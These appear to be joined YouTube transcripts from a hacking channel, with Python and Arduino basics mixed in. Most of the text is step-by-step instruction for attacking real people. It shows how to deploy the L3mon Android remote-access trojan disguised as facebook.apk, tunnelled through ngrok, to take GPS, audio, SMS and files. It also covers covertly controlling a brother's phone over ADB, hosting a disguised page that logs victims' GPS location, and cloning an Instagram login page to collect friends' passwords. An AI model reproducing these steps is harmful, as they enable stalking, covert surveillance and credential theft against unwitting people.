topic. Without further ado, let's get started. So guys, before we get started, let me just show you a quick sneak peek over the Lemon framework. So this is the user interface of a Lemon, and you can see the info, first seen and last seen of that person. If you want to get the real-time update GPS location of that person, you can actually get the GPS location request update, or you can actually set that time for in which you have to update the GPS location of the Android device. And you can use the microphone tab to record the audio from the Android device, or you can use the contacts tab to get the contacts inside the Android device. I'm not going to show you the call log, contacts, SMS, etc. because it may contain my personal information because I'm doing it on my own Android device. So you can actually get the clipboard log, notification log, SMS manager, everything is working. I'll be showing some of them at the end of this video. I'll just show some of them at the end of the video, but I'll be just showing what the things that you can actually do using the Lemon framework. So if I go to the install apps, you can see all the installed apps inside this Android device, so on and so on, etc. You can just get inside the file explorer of this Android device, and you can actually download any files to your laptop. And also you can actually use the NGROC to actually tunnel the connection between the control panel as well as your connection. You can actually access this control panel anywhere you want, as well as the Android device anywhere you want. If I use this URL over here, I'll be showing how to set up this connection in this video. So hop along, paste this URL over here, type enter. So as you can see, I have used the public URL. Actually, I can use this URL anywhere, anytime. So click on admin, and my password is a real secret one. I'll be showing that also in this video. So you can see the device is currently offline and I have access to this control panel anywhere, anytime. So let's get started. So guys, here we are. So let's get started by installing Lemon to your laptop or PC so that you can control your Android device in the time of need and do this awesome thing. So let me just go ahead and open up my browser and type in L3mon and type enter. And the first link that you see will be a GitHub link that I'll be also providing in the description. You can just go ahead and grab the link from there and follow along with this tutorial. So let me just go ahead and open up the link over here. So as you can see, you will see a page like this. So if you're kind of pro, you can just follow along with this installation process. So I'll be doing it here right now. You can just follow along with me, or you can just, read through this, but you will be encountering some sort of errors and all. You can just follow along with me, so it will be really easy and understanding and all. So the first things first, we have to install Java. So we have to install Java. So copy this code, open up your terminal, nice and easy, and paste it over here inside my terminal. And so you can see it is already installed on my system, so let's clear out that. Now the next step is to install Node.js. So if you are using any other operating system other than Ubuntu and Debian, you can just go inside the instructions here and search for your operating system. But if you're using Debian, you should install Node.js. Install Node.js, type enter, and just install that. Alright, now you have successfully installed Node.js. So it should also have npm. No, you have to install npm too. So you have to install npm to work with Node.js. So install Node package manager. So there we are, it's installing. So by that time, let me just go and explore the next step, that is npm install pm2-g. Just copy that. So guys, here we have successfully installed Node.js and Node package manager. So let me just come inside in here and copy the next step. Copy that and paste it right over here and type enter. So I'm really sorry guys, that was due to some permission error, as well as I had some conflicting files. That was a problem for the error. So now you have to type in sudo npm install pm2-d so that we give sufficient permission for the npm to install. So type enter. So there we are, we have successfully installed the pm2. So now on to the next step. So now you have to download and install the latest release of Lemon. So just open up in a new tab. There we are. Now let me just go ahead and download the zip file. Let it be. Let me just download the zip file and save the file. So guys, here we are, we have successfully downloaded Lemon. Let me just go open up the folder. Now inside downloads, let me just go ahead and use the terminal to navigate. cd 2/downloads. There we are. Let me just go ahead and make it full screen. Okay, here we are. You can see lemon.zip file is over here. I put that inside in here, so you can see it is unzipped. Now if I type ls, you can see the lemon is directly unzipped over here. So let me just go ahead and transfer all of this file to the desktop and work from there. So guys, I have created a folder named L3mod in my desktop and successfully moved all the files of L3mod to this folder or inside desktop. So let me just go ahead and navigate to desktop, cd to desktop. There we are. Let's clear this screen, cd to L3mod again, and type ls. You can see that now we are successfully inside the directory of L3mod. Now the next step, we're just gonna see the next step. Now you can see after downloading and extracting the latest release from here, you have to do npm install to install the necessary dependencies. So npm install and type enter. Next step is to install. Next step is to start index.js. So let's wait until this installs all the dependencies in order to start the server. So guys, we have successfully completed all the necessary installation steps. We have done till here installation of dependencies, and the next step is to start the index.js file and view the web page. So let me just go ahead and copy this, or let me just type in pm2 start index.js and type enter, and it will start the web page. So let me just go inside. Okay, the next step is to type in pm2 startup, pm2 startup, type enter, and it will actually start up the web page, and we can actually view the web page. Just type in 127.0.0.1 over the port 22533 and type. Before you type enter, you can see down in here, you can see in your browser navigate to this IP. So I'll be doing that. I'm doing this right now. So type enter. So as you can see, it will actually redirect you to a page like this. It will ask you for the username and password, which obviously we haven't created, but we will be creating it in a second. So let's go and create our password. So now how to create your own password for Lemon. So in order to create your own password, type ls, and you can see a file named main.db.json. So use your favorite text editor to open up that. So just use mousepad to open up this file, and you can see a file like this. Let me just zoom in. Hope you guys can see this. So if I zoom in, you can see username admin and the password is not filled up. So the password might be a MD5 hash. So when you enter the password, the server will actually hash it as MD5 and compare with this password. So you must paste the password as MD5 hash. So in order to create a MD5 hash, you can just type in MD5 hash creator. You can use inbuilt Linux. Some commands are there which I don't remember, so I'm going to use an online MD5 hash generator and use that to create the MD5 hash for me. So let me zoom in some more. Inside in here, I type in admin as my password and generate. And you can see MD5 hash. Just copy this one and come inside the mouse pad and paste it over there. There we are. So that's it. Control S to save and close the mousepad. So let me just clear this out. Now we have to restart our server in order for the changes to happen. So I'll type in pm2 restart all, and it will actually restart our server, and the necessary changes that we have made it will be updated. So we just clear out that too and come back to the web page. There we are back in our login page. If I type in admin and the password as admin, and if I type login, we can see we have successfully logged into our Lemon. You can see it's an awesome GUI. You can just use the APK builder to create the APK, and it will be an install. You can install on your Android device and connect it to your Android device, and you can see you'll have the event log in which any errors or something warnings will be logged in this tab. And inside devices, you can see online offline devices that we have. So how we are going to connect, how we are going to create our APK. So I'm going to use ngrok to route the connection through the internet to my laptop over here. So you can, if you are in local, or I mean, if the Android device is connected over your Wi-Fi, you can actually use the IP address of your laptop to do so. But I actually wanted my Android device to be connected across the internet. That's why I'm going to use ngrok to route the connection, tunnel the connection back to me. So for that, just type in ngrok and type enter, and you will see ngrok.com, ngrok online in one line. So press that. So now just go to the downloads, and choose your operating system. And I'm in Linux. You can just click this download button and you can download the ngrok and extract it to desktop or downloads or whatever folder. After that, you have to log in to ngrok, and there will be an authentication token given to you so that you can access your account. So after logging into your ngrok account inside dashboard, you will see a token like this: ngrok config add token and the authentication token. So it is used to access your account. So you have to type enter after copying and pasting it in the terminal where you have your ngrok. In my case, I am in desktop and I placed the ngrok over desktop, so I have to paste the authentication token in the desktop. So just do that and you get the access to your account. So after pasting in your ngrok authentication token, you can just type in ngrok tcp some port number and type enter, and it will actually show session status online. So as a green light, you have successfully set up ngrok. So stop it using Ctrl+C. So after that, come back to the control panel of the lemon and you can click on the APK builder tab, and you will see a APK builder section over here. So you have to pass your public IP address over here and click on build. So wait a minute. The thing is that you have to connect to the Android device over the internet, right? So I have told you I have created the ngrok for doing that. But the thing is that we have to create two tunnels for this to work, because one thing is that we have to access this lemon control panel, using a link so that we can actually control it anywhere we want. And the second tunnel is to actually get the reverse connection of the Android device back to us. So we'll be getting €2 creating two tunnels. One will be to control this control panel, and the second one will be to actually get the reverse connection back to us. So for that, go to your desktop. Inside the home folder, you will be seeing nothing because we have this hidden folder. Type Control H, and you will see a config.config folder. Inside in here, you will see inside in here you can see a folder named ngrok. Inside of that, you will see a file named ngrok.yml. So let me just go ahead and edit that. Open with mousepad. So the thing we are going to do here is that we are going to create tunnels. Just bear with me and type along. So the thing is that any spaces or indentation levels is a real mistake here. So make sure that you follow along. So type enter. So we are going to create two apps. Correctly, we have to type in 4 spaces, not tab, only spaces. 1, 2, 3, 4, and type in app 1, and insert in here 1, 2, 3, 4 spaces, and we'll pass the address ADDR, and it will be, so the first port number will be 22533, and don't forget to leave a space over here. And after that address, and we had to specify the proto, which will be HTTP, and down in here we have to pass the app2, which will be having the next address, which will be 1, 2, 3, 4, 5, and type enter. And if I type in the proto, which will be the TCP protocol in this case. So after this, type save and close the configuration file, and now type in /ngrok start all, and it will actually start the TCP as well as the HTTP tunnel which we have created. Start all, type enter. Oops, what the hell happened? All right, now I think it's dash dash dot. Oh, yeah, there we are. So we have successfully created the tunnels that we needed. Just zoom out. All right, and you can now see that we have created two tunnels, one for the HTTP connection, in which we can actually access the control panel of the lemon, and the next URL we have created is that which we have to pass on to the the APK builder. So let me just go ahead and copy this from 0 to n0.io and copy this using Shift Control C and paste that IP over here, and the port number we have to change to the port number in which we have passed over here, which will be 19496. So 19496. So click on build. It will probably take like less than 10 seconds, and it actually compile the APK, and you can actually click on download that 11 corrupted Android APK file. So guys, here we are. As you can see that the APK builder has successfully created the APK file. So let me just click on download, and it will actually download the APK. So save file, download, click on OK, and it actually download lemon. So there we are. We have successfully created the APK file. So now we have to install it and test it on my Android device. So guys, I have successfully installed the lemon.apk inside my Android device. So I have actually renamed the lemon to something like facebook.apk. After installation, the app is nowhere to be seen. It's already hidden, and it will have asked for directly to the permission, and I have enabled every permission needed for this application to work, and it is hidden and I can see nowhere. I'm sorry, I can't show you the screen right now. So it will be hidden, it will not be seen nowhere. So that's right. And if I go back to devices, you can see online device, Xiaomi, and the last seen, and click on manage to have control over the Android device. We can actually request GPS. First of all, click on GPS, request update, and it will actually update the location of the person. And if I go over to the GPS log, you can see view the GPS log of that person. If I go to GPS settings, you can actually set how much time you have to update, in which interval you have to update the person's location. You can actually use the microphone to control the microphone, grab some audio from the person, and you can use contact list to get the contact of that person. I'm not doing this because I don't want to show my personal information outside, so that's why I'm not trying it, but you can definitely try and see. It definitely works. I have tried it. It is working perfectly well. And we can see notification log, call log, Wi-Fi manager, installed apps. Let me just view installed apps. Fair enough. Safari request update. So as you can see, I have got all the apps that is installed on this Android device. So let me just go to SMS show. Do I have to show? No, I'm not going to show my SMS. Let me just go inside the File Explorer and show some other things. So you can see I'm inside the File Explorer, and if I use, let me just go inside Telegram. Because the files, please wait, and it is actually okay, and here we are. So let me just go inside Telegram images, requesting files, please wait, and it'll actually load up the files. It's probably because of so much of files. You can actually download any files that is inside this Android device. Let's try again that. So File Explorer, go to Telegram documents. Here we are. We have actually loaded up that anyways. So let me just download the smallest file possible. So you can see there's so much of files. That's why it took so much time to download. Let me just download this PDF. Probably PDF is small, so just download that and see. So I have downloaded that. Some notification has been seen. So if you come down to downloads, you can actually download and view the downloaded files. So alright guys, that's it for now. I'm not going to show you this PDF because it may contain some import documents. Let me just show you that it's downloadable. You can click save and save this file and download and view the file, whatever files inside the Android device. You can get the call log, the clipboard log, notification log, the SMS of that person, etc. and etc. So that's it. So as you can see, I have downloaded the PDF to my downloads folder. So guys, thank you for watching this video. Please make sure that you like and subscribe to my channel. Obviously I haven't filmed the content yet because I just filmed the intro and the end in a row. So please do like, subscribe to my channel. If you have any comments or questions regarding this topic, just put in the comment below. I will definitely check in that. So thank you for watching and have a nice time. Today I'm going to hack into my brother's Android device and prank him, hopefully. So this is going to be the second video of NAB Lab prank videos. We have already done another video where I actually managed to get the credentials of my friends saying free Instagram followers. So if you want to watch that video, I will be putting it somewhere. Just go ahead and watch that. So now in today's video, we are going to actually hack into my brother's Android device and manipulate it according to my need. It will be like a zombie or a ghost inside his mobile device. So basically the Android device will be a slave to me. Now how I am going to accomplish this? I am going to exploit ADB Android debug bridge to gain access to his Android device. Now you are probably thinking that Android debug bridge is an official feature of an Android and it's not a 100% hack, right? Yes, it's an official feature of an Android, but it's really cool to watch how this works and how we can actually manipulate ADB commands to make the Android device look like a zombie. So before we get started, as always, a quick disclaimer that this video is a 100% education purpose only. The devices that we are going to use here today has the authorization of us, and also we have the permission of the owner. So take it as a 100% joke or 100% informative video. So with that being said, let's get started. So guys, I am set up over here. I have already installed Kali Linux on my device, and also ADB and scrcpy, which are the weapons of choice for today. Also, if you want a tutorial based video on how I actually managed to do this, just go ahead and watch this video. I will be putting it in the annotation sidebar. So guys, now let us get started by finding the IP address of the Android device in which we have to connect to. So for that, I will be logging inside my router's login page and find the clients connected to it. So you can also use Nmap for this, but I will go with the router's page. Here, let me just go ahead inside the client list and find the IP address of the Android device. So in this case, 192.168.25.223. Perfect. Let me just go ahead and copy that. So now let me just open up my terminal over here and type in ADB connect to 192.168.225.223 over the port 5555 and type enter, and it will get connected to the IP address. Perfect. Now let me just go ahead and open up the screen of the Android device over here real quick. So for that, let's just go ahead and open up a new terminal, zoom in a little bit and type in scrcpy or screenpy. So type enter. Here we are. You can see the Android device screen is actually turned off right now, and we can see he's not actually using it right now. So until he turns on the screen, we could actually play some naughty things, right? So let me just go and open up the ADB shell and see the directory tree inside the Android device. So let me just type in ls and type enter. Okay, let me just go inside /sd card and ls, and you can see we are actually inside his mobile device. So let me just go ahead and actually pull a file from his Android device. So let me just go ahead with this screenshot of WhatsApp. Okay, then let me just go on with use that. So let me just go and actually copy this file link and exit from the shell adb pull /sd card. The first parameter will be from where and what are you actually going to pull. This one. So type enter. Here we are, we got the picture. Now if we go inside the file manager, and if I go inside, you can see the screenshot over here. I'm going to open and show you who that is actually. So I'm just gonna minimize that. Now I am actually going to place an audio file inside this mobile device so that I can actually play it in the right time. So let me just go ahead and record myself an audio. So I'm going to use error code. Okay, I didn't have error code, so let me just go and install that. So now let's go ahead and record the audio file that we have to actually record and place it on this device. So let me just go ahead and use error code to record the audio. So error code record.wave, type enter. Hey, you got hacked, bro. Let me just go ahead and stop this and just type ls, and you can see record.wave file over here. So let me just go and play that. Hey, play record.wave, type enter. Hey, you got hacked, bro. Let me just go and okay, that's not really cool, but it does the job. So now let's just go ahead and place this record.wave file to his Android device so that in the right time we can actually play that back to him. It will be really awesome. Let me just go ahead and pause this video for a second here so that I can tell you guys that please do like and subscribe so that I can know that you really like the video that I'm making. So leave a like, subscribe, it means a lot to me. So moving on. For that, let me just type in adb pull. It's not pull, it's push. What to push actually? Record.wave file, and here actually put to where. So I'll be putting it inside /sd card. SD card, and type enter. And there we are. Let me just type in adb shell and cd to /sd card. And type ls, and you can see record.wave file somewhere. You can see record.wave file is over here. Perfect. Then just go and exit from here, and let's wait until he gets started using his Android device. So guys, after a long wait, he started using his Android device over here. You can see he has started using his Android device. Oh, he started using WhatsApp. Oh my god. He have no idea that I am really actually watching over him right now. So let us see how long I can stand until he realizes that I was watching over him. So now let us get started over here by making the Android device look like a zombie, right? So that was the main intention of this video, right? So now let us go ahead and start some weird indent and applications so that he may drive to nuts. So let's get to see the installed apps of this Android device. So for that we must first see the installed apps here, right? So for that we have to actually type in adb shell pm. I think it stands for package manager, and list packages, and type enter, and it will return all the installed packages inside this Android device. So now let me just go ahead and see let me just go and open up the Spotify application. So let me just go ahead and copy this over here, and so now I am going to find the activities which we need to start. So I'm going to go ahead and paste the package name over here. So what it basically does is that it will actually find all the activities in which we can actually start to this Android device. So if I type enter, as you can see, we got different activities. We have got the main activity of Spotify. So let me just go and copy that selection over here, and you just type in adb shell and m start -n, and if I paste this over here and type enter, you can see it just went to Spotify, and he's actually closing that. Okay, and he's back into his WhatsApp. Now let us start that again. I will do that until he is drive nuts. I stopped that because I don't want him to figure out this fast, because if he finds out right now, this video will be total waste because it will be like some 5 minutes or something. So I wanted to actually go longer, so I will be doing another tricks on this Android device. Also, for the record, we can actually control the screen over here using our mouse too. You can see. So I just continued to prank him, and he actually went mad. He actually tried to reboot his device 2 to 3 times, but in vain. So guys, he is currently watching YouTube videos, so I think it's a really good time to actually turn on and off his screen. So adb shell input key event 26, type enter, and you can see his screen went off. Now he had to turn it back on, and he's back there. He started watching again. Now let us go and turn that again off, and there is back again there, turning on the screen, playing again the video. He had no idea that I was watching him all the time. So guys, let us get into some more interesting parts. So let me just go ahead and turn down his volume to 0. db shell service call audio to 0, and you can see his volume actually went down. Okay, he's now increasing it. Now let us do that again. You can see his volume again went down. Why don't he realize that I was doing it all the time? Okay, let's do that again. So whatever guys, let us go ahead and play the audio that we have already pushed to his device. So this code over here will actually start the action necessary for playing the audio file. So I'll just also pass adb shell. So also guys, whatever commands that I use in this video will be provided in the description. Make sure you check that out. So I'll be playing /sd code, is to make it space /sd code, and the file name will be record.wave. So guys, let us go ahead and run and see. Enter. And you can see the record is actually playing, and he doesn't have a response on that. But he doesn't respond to it. Why he doesn't respond? Okay, let's go ahead and play that again. So guys, I have lost my patience. So let us go ahead and adb shell and reboot the Android device. There it's gone. You can see it's got stuck. Wait a second, I can hear him coming up. Oh, he's here. So that went well. Hope you guys enjoyed this video. Please leave a like and subscribe to my channel. If you want a total based video of how I managed to do this, just go and watch this, where I actually managed to hack an Android device completely remotely, and it will be a tutorial based walkthrough around how I actually managed to do this. That the video like this will be coming up real soon. So until then, ciao. So as you can see, it have returned the date and time of the log, and also it have returned the current Google Map location of that person. And you can see that we have got the Google Map location of that person, and have an accuracy of 21 meters. What's up guys, and welcome back to another YouTube video. In today's video, I'm going to show you how to actually track anyone's location using your own device. irrespective of its operating system, such as Android or Windows. You can actually track anyone's location from your own device. So what we are going to do is that we are not actually tracking the IP based location of that person. We are actually going to track the exact GPS location of the person. So we are actually using a tool which actually made here inside NAB Lab. We made the tool, so it has its own demerits and all, but it can do the job. So before we get started, first of all, go ahead and subscribe and like to my channel, otherwise this tool is not going to work for you. Second of all, please don't you do it for any illegal or privacy threatening stuff. If you use it for any illegal purposes, there will be noise knocking on your door saying FBI, open up! So please don't do that. So with that being said, let's get started.
A few moments later.
So guys, this is the tool that we have made here. This is a NAB location tracker. So basically what this does is that it will actually track that person's exact GP location and actually save it in the user.txt file. So let me just go ahead and demonstrate and show you what it actually does. So now let me just go ahead and clone this to my desktop. Click clone. We are in, and let me just run and show you what this application does. So now it's running, and let me just go to the URL and see that in action. You can see press allow to continue, and it will ask for your location, and if I allow, it will actually redirect to me to the original Google site. Here we are. Perfect. Now if I go back to the directory of NAB Lab, let me just go ahead and stop this, and if I go ahead and inside the directory of NAB Lab, you can see user.txt file. If I just use it to see the, so as you can see, it has returned the date and time of the log, and also it has returned the current Google map location of that person, and it has also returned the Google its accuracy, the radius of in which the person might be in. So you can see it's a really bad accuracy. That's because I'm using it in a laptop. But if you're using it in an Android device or mobile phone, it will actually has a pretty good accuracy, like a 20-meter accuracy. So let me just go ahead and show that inside my phone. So guys, I have already opened in my mobile device over here. Sorry because I can't show you that because I'm filming my phone. So let me just go ahead and show that what I got. So cd, okay, cat user.txt. And as you can see, I got a Google map location link over here, and with an accuracy of 21 meter. You can imagine we have an accuracy of 21 meter. So let me just go ahead and show this place. Just go ahead and copy that and paste it on my Google over here. As you can see, it's loading up Google Maps, and you can see a place, and it's the exact location of my place. So that's it. Let me just go ahead and show you how to do this. So in the second part of this video, I'm going to show you how to actually deploy this using your mobile device or your PC or whatever you have. So if you're into really good programmer, or you know to code, or you have a Linux machine, it will be really easy for you to actually deploy and use it in your own PC. But it becomes handy if you really deploy it on Python Anywhere servers. So let me just go ahead and show you how to deploy this web app on Python Anywhere server. So guys, welcome to the part 2 of this video. So I'm going to show you how to actually deploy my site or the tool on our Python Anywhere server. You can use actually Android device or Windows machine for doing this. So I'm going to demonstrate this on a Windows machine. So first of all, go inside the link provided in the description, a GitHub link. So now download a zip, and it will be downloaded. So let me just go ahead and open the file directory. Here we are. So let me just go ahead and extract that, extract all, and extract here. So So perfect, I have extracted the zip file, and this is the files inside the zip folder. So guys, after doing this, we have to go to python.anywhere.com. So here we are, you can see a page like this. So speaking about Python Anywhere servers, it is actually a free server actually used for running and hosting our Python web applications. So start running Python online in less than in a minute. So then you can see a page like this, a beginner free plan, or you can have a good domain name and have good specifications of the web server using some of the subscriptions, but I will go with a free beginner account. So then you will be redirected to a page like this. You can create a new username. I will go with Google Ad Lead Services, and I will give a dummy email, dummy123 at gmail.com, and I will actually give a legit password so that I can relog in again if I want. So I agree and register. So there we are, we have created a web server. Enter, and you can see a page like this saying dashboard, and it will actually show you the CPU usage, the file storage and all. But I am interested in creating a web app, open web app. Then you can see you have no web apps, so here to create one. So let me just go ahead and add a new web app. So your web app's domain name will be Google Ad Lead Services.python.com. So not a problem. So the tool is actually made on Flask, so I will actually go with Flask Python 3.7 and next. If you don't know something, or if you have something trouble with this, just put it on default. So you can see all done, your web app is now set up, details below. And if you put this link on the browser, you can see hello from Flask. Perfect. Now we must be careful for what we are going to do here. So let me just go inside my site, go to directory, and you will see a file named flaskapp.py. So go ahead and open that. You will see something like this. We have to change the source code for this application to be this app file. So let me just go ahead and open this app, and so here we are. Let me just go ahead and copy that and paste directly over here and save that. Don't forget to press save, otherwise the work will be lost. So let me just go back. Now let me go inside the home directory of Google Ad Lead Services. So let me just go ahead and create a new directory named templates. So a new directory. There we are. So now we have to do is that upload a file. So it will be inside the templates folder, index file. So it's actually made inside the Google Ad Lead Services. So if I go back, you can see templates folder is here, my site folder is over here. Perfect. Now we have to upload one more file, which is user.txt file. So this will be this one. Perfect. Now you can see we have uploaded every file. So let me just give a walk around what we have done here. We have uploaded the user.txt file on the home directory inside our main folder, Google Ad Services, and we have also changed the source code for the site inside flaskapp.py, and we have also created a new folder named templates, and we have uploaded the index.html file to the folder. So now basically what you want to do is that go to web, reload the Google Ad Services. You'll actually reload and write the changes you have done. So let me just go to the URL, and it like to say internal server. Why is that? To know the errors you have in your web application, go to error log and it will show you the error. Template not found. Oh yes, I have done a pretty much mistake, but sorry for that. I have actually created the templates folder in the main working directory. I have to actually create the templates folder inside my site. Sorry for that. Now we have to create a templates folder. Templates folder, new directory. And now we have to upload a file, which is the index.html file. Perfect. Now let me just go ahead and reload the web application again, and let me see the changes. So let me just reload this page and see. You can see press allow to confirm, and it is not showing us the location button for allowing, right? That is because we haven't toggled the force HTTPS option over here. Let's toggle that on and again reload the web application. So guys, we have reloaded the page, and now let me just go ahead and refresh this page, and you can see it's now HTTPS and it is asking your location. Press allow and it will actually redirect to the original Google page. Now let me just go ahead and show you where the location is saved. It's inside this home directory, inside Google Ad services, inside user.txt, and you can see the location and the accuracy. Perfect. Let me just show you how to actually change the redirecting URL. So let's go inside the working directory, inside the my site, inside templates. Let's go inside the index.html, and you can see https google.com. If we go ahead and change that to like https say like flipkart.com or something, flipkart.com, and if I go ahead and save that, make sure you reload the web app. You can actually reload the web app from here directly. So guys, let me just go ahead and show you its work inside the mobile device. So let me just go ahead and paste the URL and go, and you can see press allow to continue, and as you can see, it directly actually redirected to the flipkart.com's official site, and the user will not, or the victim will not know what actually happened over here. So now if we go back to the Python in your server, let me just go ahead inside the user.txt file, and you can see that we have got the Google map location of that person and have an accuracy of 21 meter. So that's it. So guys, thank you for watching. Make sure that you subscribe and like this channel. Also, if you have any issues or doubts regarding what I have done here today, just put on the comments. I will be replying that. So our new video will be coming up real soon. So until then, ciao.
What's up guys, and welcome to the basic Python tutorial series. In this tutorial series we will be covering about basic Python programming language, starting from the installing of Python programming language till object oriented programming, and also we will be also covering different modules and other stuff. So let's get started. So this tutorial is actually meant for a complete beginner who doesn't know anything of programming languages and has an aspire to learn it. So Python is actually a best programming language to start with. So if you are a beginner / intermediate also, this course will be really helpful for you. So first of all, for getting started with Python, you must first install Python, right? So head over to python.org/downloads over here and grab your latest version of Python. For me, it will be Python 3.10. So if you are using a Windows 7 or earlier versions of Windows, it won't work actually, so you can grab the older versions from here, right? So I'm going to grab it my latest version, downloading that. Okay, so when the download is complete, you have to install it, open file. So
this is the window for the installation of Python. So you have to check this box also. It's nothing. It will also add to path, to Python to path, and you have to just click on install now. So it will start processing, and yes, okay, setup in progress. So I will pick up after installation is complete.
A few moments later.
So we have installed Python on our computer now. Let us open up IDLE to see that. IDLE is known as Integrated Development Learning Environment. So people who doesn't know that, it's actually used for scripting code in it. So this, when it first opens up, what we see is called shell, Python shell, which will be used for writing code. So let us test it by writing it in a print statement, which is hello world, and it prints hello world. Fantastic. So what is this line over here? That's new. I haven't seen that in a while. It's a new update, I guess. So so if this works, everything works fine and perfectly installed. So now we have to start coding. That's the only thing. So before diving into that, let me just show you and walk around through all of this. Ideally, you can use other your preferred text editors like Sublime Text, which I personally prefer to use, and also PyCharm, which is the great one to use if you have high system capabilities. So for beginners, it is best if you use ideally to start with. So it will be really quite nice if you start with ideally. So if you have to create a new scripting mode, so just turn the scripting mode, just press Ctrl and N, or else you can press File and New File. Okay, so you will get a new window like this, untitled. Now we have changed to scripting mode, so you have to change this file with the name. So let me just name it as tutorial.py something, tutorial.py, and you can see the name will change it here, tutorial.py, and we can now start writing code. So I was just thinking if I could make some briefing of the part 2, which will be variables and other data types. So I will take it in part 2, but I will just brief it out in part 1 just to make sure that you understand everything. So variables is a pointer or like a bag. You can just store something in it, right? So if I write x is equal to 1, it means that x points to 1. So if we call for x, it will automatically give 1. So when we show that, F5 to run in ideally, so process F5 and source will be saved. Okay, enter, and you can see nothing is printed out. That because we haven't printed anything. So call x, it says it's 1. So that's it. And the next thing I want to just talk about is the print statement. Print statement is something used for printing something to the console or the terminal. If we just write a print statement with parentheses and give a value to it to print out the console, it just print out 1. So like I see, if you have to print something like a string of values, right? This is a new world. So x equal to in double quotes, this is a new world, right? We can also use single quotes for mentioning a string, but I will just use double quotes for now and just ask for printing x. So it will actually prints out this is a new word. So that's easy. So I was just briefing this, right? You can just practice on, and the next video will be a real starting of the tutorial, and you can learn different types of data types and the print statement especially. And so we are winding up this video. Make sure you subscribe and like. So the part 2 will be coming out real soon. And until then, ciao.
So hello guys, welcome back to NAB Lab. Today we're gonna install the Arduino IDE and we're gonna learn about the basics of Arduino. So Arduino is basically a microcontroller which can be programmed to do a specific task or multiple tasks at the same time. It's a really helpful device. Many hobbyists have Arduino for their projects, and it can do very interesting things with it. If we have the right sensor and modules, we can do many interesting things with it. So let's first install the Arduino IDE. So just open up a browser. Anyone, I am using the Microsoft Edge. Then type in Arduino IDE, and then we will have click on the site that comes first. Click on it. It's a site named Arduino.cc. It's the official site of Arduino, and from here you can see the download options. We have Windows 7 and newer. For Linux there are many Linux software, and for Mac OS there is this software right here. So in my system it's a Windows, so I'm gonna install Windows. So if you want to donate or contribute some money, you could just contribute, or just you want download, just click here, just download, and the download will start. So we'll continue after the download.
A few moments later.
So the software has been downloaded. We can install it now. So it's right here. Double click on it. You can see a window like this. Click yes, and these are the terms and conditions of installing the software. If you want to read it, you could just read it, or just click I agree. And this is a page for installing the drivers you want. You need all of it, and just click next and click install. So when I'm installing, let's learn about what's an Arduino. This is an Arduino. To be exact, it's an Arduino Uno, and there are many other variants of this Arduino, like Arduino Lilypad, Arduino Pro Mini, Arduino Nano, Arduino Mega. There are different variants with different powers and capabilities. And the thing you see right here, it's the brain of this Arduino board. It's called an Atmega 328P chip. It's a microcontroller. It controls basically everything in this board, and we could program it and do whatever we want with it. And this is the place where we connect the cable for uploading the data and things like that. And this is a DC socket. If you wanted to power it from an external source, you could just use this DC socket. And that's pretty much it for the Arduino. This Arduino throughout the projects, we're gonna use this thing because it's really helpful and it's easy to use. It's got many pinouts, and as you can see, there are many sockets right here. These are the output pins. And if you look closely, there are digital pins and analog pins. It can be seen right here. It's labeled A1, A2, A3. These are the analog pins, and just with numbers, it's called the digital pins. So if you look closely, there is a sine wave symbol right here with some of the pins. That's because it's a PWM signal pin, because PWM stands for pulse width modulation, and you could use that in many other projects if you want some extra data carriage or something. And that's basically it. This is an Arduino, and that's it. And as you can see, the software is being installed. If you wait a little bit longer, it will get installed. Okay, close it. As you can see, it's installed right here. It's an Arduino. Double click on it, it will open. So this is something that I worked on before. We could just open a new window. Usually when you open it, you could see something like this. We have a setup, void setup, and void loop. Here we can type in all the things, like we can define the pins we want and read and write speed. And for here you can type the codes that you want to go in loops, like you want it to do it continuously. So let's connect our Arduino. So the Arduino is connected, and you must select your board, like go to tools, type here board. So system is an Arduino Uno, so it's right here. Click on Arduino Uno, and we enter COM port. You can find it's already selected. From you must select the USB port where you have connected it to be right here. So we have connected, and that's it. We are connected. We are already online, and we can type in. First of all, I'm gonna print hello world. So for that, type in serial.begin. This will begin. This will automatically start the serial monitor, and just define the baud rate as 9600. It's the baud rate, and that's it. The word setup is done. Now we want to print serial.print hello world. So that's it. Now just before uploading we should verify the code. So it's verifying. Save the code first, then it's compiling the sketch, and if it's done compiling and there is no error in our code, it will just show done compiling, and if there is error it will come right here, and we know that it has some errors. So it's done compiling, so sketch is good, and we can upload it. Sketch is being uploaded, and it's done uploading. So this right here is a serial monitor. Click on it and press on the reset button, and nothing shows up. Oh, sorry. So you must select the baud rate that you gave there, which is 9600. And now yes, it's because we didn't give the correct baud rate, because whatever you give here, it should come right here. So that was the reason. And if you press the reset button on Arduino again, you can see that it's printing again hello world. So that's the use of the reset button. So that's it for this video. Thanks for watching, and I will see you next time.
So guys, you won't believe this. I literally got everyone's password. Here, let me show you real quick. You can see that I have got literally everyone's password. What's up guys, and welcome back to the YouTube video. In this video we are going to hack into my friend's Instagram accounts. So before we get started, a quick disclaimer that no one's account or privacy is actually violated in this video. So this is only for demonstration purpose, so please take it that way. With that being said, let's get started. Actually, I know that many of my friends are obsessed to get Instagram followers, and they are using some of the tools to get free Instagram followers. So using that knowledge, I am going to send this to my friends, and hopefully they will enter the credentials. Hacking into an Instagram account means brute forcing to everyone, right? But it will take about millions of years for me, so I am going to go with the social engineering attack. You can see I have cloned a Instagram page directly here, which is hosted on python.com. Please don't go to the URL. Actually, I will disable after this video is complete. So you can see it's almost the same, just have slight alignment variation of course, but it can look almost same. So let me show you what it does. This is my Instagram ID, and just enter the password, login. So I have earned about 8,184 followers. So it will say congratulations, and it will be delivered in 2 to 3 days. So please wait. And if you didn't get the followers, click here and continue with Instagram. So it will actually redirect to the original Instagram page, and the user have to log in again. So now let me show you where my passwords are saved. It's inside python.com, which is my hosting platform. So Instagram giveaways directory, and you can see a user.txt file where the passwords are saved. Here we have got the username and password that I have entered. So likewise, I'm going to get the passwords and credentials of everyone. So let me just use a URL shortener to actually shorten this URL, so it will be more trustworthy, right? So for the URL to be more trustworthy, I'm going to use Notepad and type in some messages over there. This is basically the message I'm going to send them. Then just go ahead and copy that. I'm going to send it to my friends, and let's see who is going to enter their credentials and give the credentials to me. So guys, you won't believe this. I literally got everyone's password. Here, let me show you real quick. Don't worry, I will just blur it out. I can show you the password, right? I know that this is the dirtiest trick that you can do to your friends, but I just want to make sure that they doesn't fall into this kind of false promises. No one is going to give you free followers, right? And I promise that I am not going to look or peek into their Instagram accounts. I have already reminded them to change their passwords, and I have already told them that they have been hacked. So guys, please don't give your credentials to any invalid or untrusted sites. You will be just hacked. So please make sure that. 